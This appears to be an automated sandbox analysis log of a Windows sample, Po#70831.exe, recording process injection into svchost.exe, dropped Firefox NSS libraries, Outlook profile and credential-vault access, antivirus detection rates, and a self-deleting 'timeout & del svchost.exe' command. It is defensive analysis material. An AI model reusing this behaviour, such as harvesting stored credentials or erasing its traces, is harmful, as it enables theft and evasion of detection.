                Source: C:\Windows\SysWOW64\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-7A741079-EF2CFB53-A8A69178
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5308:120:WilError_03
                Source: C:\Users\user\Desktop\Po#70831.exe File created: C:\Users\user\AppData\Local\Temp\aut2BB3.tmp
                Source: Po#70831.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\Po#70831.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: SELECT ALL id FROM %s;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                Source: svchost.exe, 00000002.00000003.2434642976.000000000326F000.00000004.00000020.00020000.00000000.sdmp, 45408433256266381758956.tmp.2.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Po#70831.exe Virustotal: Detection: 33%
                Source: Po#70831.exe ReversingLabs: Detection: 71%
                Source: unknown Process created: C:\Users\user\Desktop\Po#70831.exe "C:\Users\user\Desktop\Po#70831.exe"
                Source: C:\Users\user\Desktop\Po#70831.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Po#70831.exe"
                Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
                Source: C:\Users\user\Desktop\Po#70831.exe Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\Po#70831.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\Po#70831.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\Po#70831.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\Po#70831.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\Po#70831.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\Po#70831.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Po#70831.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Po#70831.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Po#70831.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Po#70831.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: crtdll.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mozglue.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winmm.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wsock32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: vcruntime140.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dbghelp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp140.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: appresolver.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: bcp47langs.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: slc.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sppc.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: pcacli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: Po#70831.exe Static file information: File size 1295872 > 1048576
                Source: Po#70831.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Po#70831.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Po#70831.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Po#70831.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Po#70831.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Po#70831.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.dr
                Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.2.dr
                Source: Binary string: ucrtbase.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.2.dr
                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr
                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.2.dr
                Source: Binary string: wntdll.pdb source: Po#70831.exe, 00000000.00000003.2368245174.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, Po#70831.exe, 00000000.00000003.2368365177.0000000003C50000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.2.dr
                Source: Binary string: vcruntime140.i386.pdbGCTL source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.2.dr
                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr
                Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr
                Source: Binary string: msvcp140.i386.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.2.dr
                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.2.dr
                Source: Binary string: ucrtbase.pdbUGP source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.2.dr
                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.2.dr
                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.2.dr
                Source: Binary string: wntdll.pdbUGP source: Po#70831.exe, 00000000.00000003.2368245174.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, Po#70831.exe, 00000000.00000003.2368365177.0000000003C50000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr
                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.2.dr
                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.2.dr
                Source: Binary string: vcruntime140.i386.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.2.dr
                Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.2.dr
                Source: Binary string: msvcp140.i386.pdbGCTL source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.2.dr
                Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.2.dr
                Source: Po#70831.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Po#70831.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Po#70831.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Po#70831.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Po#70831.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: ucrtbase.dll.2.dr Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
                Source: C:\Users\user\Desktop\Po#70831.exe Code function: 0_2_004942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004942DE
                Source: msvcp140.dll.2.dr Static PE information: section name: .didat
                Source: C:\Users\user\Desktop\Po#70831.exe Code function: 0_2_004B0A76 push ecx; ret 0_2_004B0A89
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D86E push 0040D89Ch; ret 2_2_0040D894
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D870 push 0040D89Ch; ret 2_2_0040D894
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004140C0 push 004140ECh; ret 2_2_004140E4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004108C8 push 004108F4h; ret 2_2_004108EC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040B0F7 push 0040B124h; ret 2_2_0040B11C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040B0F8 push 0040B124h; ret 2_2_0040B11C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00408080 push 004080B8h; ret 2_2_004080B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00408158 push 00408196h; ret 2_2_0040818E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00408970 push 004089E4h; ret 2_2_004089DC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00408994 push 004089E4h; ret 2_2_004089DC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004089AC push 004089E4h; ret 2_2_004089DC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00415208 push 0041528Ch; ret 2_2_00415284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040CA0C push 0040CA3Ch; ret 2_2_0040CA34
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040CA10 push 0040CA3Ch; ret 2_2_0040CA34
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417AEC push 00417B18h; ret 2_2_00417B10
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00404BC0 push 00404C11h; ret 2_2_00404C09
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D3C0 push 0040D3ECh; ret 2_2_0040D3E4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040A3E4 push 0040A410h; ret 2_2_0040A408
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040C390 push 0040C3C0h; ret 2_2_0040C3B8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040C394 push 0040C3C0h; ret 2_2_0040C3B8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040A3AC push 0040A3D8h; ret 2_2_0040A3D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040DC44 push 0040DCA3h; ret 2_2_0040DC9B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040DC0C push 0040DC38h; ret 2_2_0040DC30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040B41E push 0040B44Ch; ret 2_2_0040B444
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040B420 push 0040B44Ch; ret 2_2_0040B444
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040A438 push 0040A464h; ret 2_2_0040A45C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A4F4 push 0041A51Ah; ret 2_2_0041A512
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00414C80 push 00414CACh; ret 2_2_00414CA4
